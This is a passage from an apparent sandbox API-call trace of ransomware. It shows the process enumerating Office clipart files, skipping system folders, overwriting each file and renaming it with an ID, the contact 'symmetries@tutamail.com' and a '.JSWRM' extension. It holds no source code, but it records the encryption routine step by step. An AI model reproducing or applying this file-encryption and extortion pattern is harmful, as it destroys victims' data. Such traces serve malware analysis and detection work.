lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02094_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0097.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0097.633] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0097.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0097.634] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02094_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02094_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.634] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6986) returned 1 [0097.634] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.634] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1b40) returned 0x205850 [0097.634] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1b40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1b40, lpOverlapped=0x0) returned 1 [0097.636] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.636] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1b40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1b40, lpOverlapped=0x0) returned 1 [0097.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0097.636] CloseHandle (hObject=0x314) returned 1 [0097.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0097.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0097.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0097.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0097.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0097.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0097.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0097.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0097.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0097.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0097.637] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02094_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02094_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02094_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02094_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0097.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0097.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0097.638] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x540, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02227_.WMF", cAlternateFileName="")) returned 1 [0097.638] lstrcmpiW (lpString1="SO02227_.WMF", lpString2=".") returned 1 [0097.638] lstrcmpiW (lpString1="SO02227_.WMF", lpString2="..") returned 1 [0097.638] lstrcmpiW (lpString1="SO02227_.WMF", lpString2="...") returned 1 [0097.638] lstrcmpiW (lpString1="SO02227_.WMF", lpString2="windows") returned -1 [0097.638] lstrcmpiW (lpString1="SO02227_.WMF", lpString2="recovery") returned 1 [0097.638] lstrcmpiW (lpString1="SO02227_.WMF", lpString2="perflogs") returned 1 [0097.638] lstrcmpiW (lpString1="SO02227_.WMF", lpString2="documents and settings") returned 1 [0097.638] lstrcmpiW (lpString1="SO02227_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.638] lstrcmpiW (lpString1="SO02227_.WMF", lpString2="system volume information") returned -1 [0097.638] lstrcmpiW (lpString1="SO02227_.WMF", lpString2="msocache") returned 1 [0097.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0097.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02227_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02227_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02227_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0097.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0097.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02227_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02227_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02227_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0097.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0097.638] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0097.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0097.638] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02227_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02227_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.639] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1344) returned 1 [0097.639] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.639] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x540) returned 0x234408 [0097.639] ReadFile (in: hFile=0x314, lpBuffer=0x234408, nNumberOfBytesToRead=0x540, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x234408*, lpNumberOfBytesRead=0x345e89c*=0x540, lpOverlapped=0x0) returned 1 [0097.641] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.641] WriteFile (in: hFile=0x314, lpBuffer=0x234408*, nNumberOfBytesToWrite=0x540, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x234408*, lpNumberOfBytesWritten=0x345e898*=0x540, lpOverlapped=0x0) returned 1 [0097.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x234408 | out: hHeap=0x1e0000) returned 1 [0097.641] CloseHandle (hObject=0x314) returned 1 [0097.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0097.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0097.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0097.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0097.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.641] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0097.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0097.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0097.642] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0097.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0097.642] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0097.642] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02227_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02227_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02227_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02227_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0097.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0097.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0097.643] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x334, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02228_.WMF", cAlternateFileName="")) returned 1 [0097.643] lstrcmpiW (lpString1="SO02228_.WMF", lpString2=".") returned 1 [0097.643] lstrcmpiW (lpString1="SO02228_.WMF", lpString2="..") returned 1 [0097.643] lstrcmpiW (lpString1="SO02228_.WMF", lpString2="...") returned 1 [0097.643] lstrcmpiW (lpString1="SO02228_.WMF", lpString2="windows") returned -1 [0097.643] lstrcmpiW (lpString1="SO02228_.WMF", lpString2="recovery") returned 1 [0097.643] lstrcmpiW (lpString1="SO02228_.WMF", lpString2="perflogs") returned 1 [0097.643] lstrcmpiW (lpString1="SO02228_.WMF", lpString2="documents and settings") returned 1 [0097.643] lstrcmpiW (lpString1="SO02228_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.643] lstrcmpiW (lpString1="SO02228_.WMF", lpString2="system volume information") returned -1 [0097.643] lstrcmpiW (lpString1="SO02228_.WMF", lpString2="msocache") returned 1 [0097.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0097.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02228_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02228_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02228_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0097.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0097.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02228_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02228_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02228_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0097.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0097.643] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0097.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.643] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.643] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0097.643] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02228_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02228_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.644] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=820) returned 1 [0097.644] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.644] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x330) returned 0x20b1f8 [0097.644] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x330, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x330, lpOverlapped=0x0) returned 1 [0097.646] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.646] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x330, lpOverlapped=0x0) returned 1 [0097.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0097.646] CloseHandle (hObject=0x314) returned 1 [0097.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0097.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0097.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0097.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0097.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0097.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0097.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0097.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0097.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0097.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0097.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0097.646] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0097.646] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0097.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0097.647] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02228_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02228_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02228_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02228_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0097.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0097.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0097.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0097.647] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x103d2836, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x103d2836, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x103d2836, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x900, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="SO02233_.WMF", cAlternateFileName="")) returned 1 [0097.647] lstrcmpiW (lpString1="SO02233_.WMF", lpString2=".") returned 1 [0097.647] lstrcmpiW (lpString1="SO02233_.WMF", lpString2="..") returned 1 [0097.647] lstrcmpiW (lpString1="SO02233_.WMF", lpString2="...") returned 1 [0097.647] lstrcmpiW (lpString1="SO02233_.WMF", lpString2="windows") returned -1 [0097.648] lstrcmpiW (lpString1="SO02233_.WMF", lpString2="recovery") returned 1 [0097.648] lstrcmpiW (lpString1="SO02233_.WMF", lpString2="perflogs") returned 1 [0097.648] lstrcmpiW (lpString1="SO02233_.WMF", lpString2="documents and settings") returned 1 [0097.648] lstrcmpiW (lpString1="SO02233_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0097.648] lstrcmpiW (lpString1="SO02233_.WMF", lpString2="system volume information") returned -1 [0097.648] lstrcmpiW (lpString1="SO02233_.WMF", lpString2="msocache") returned 1 [0097.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0097.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02233_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02233_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02233_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0097.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0097.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02233_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0097.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SO02233_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SO02233_.WMF", lpUsedDefaultChar=0x0) returned 12 [0097.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0097.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0097.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0097.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0097.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0097.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0097.648] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SO02233_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\so02233_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0097.648] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2304) returned 1 [0097.649] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x900) returned 0x20c6c0 [0097.649] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x900, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x900, lpOverlapped=0x0) returned 1 [0097.652] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, 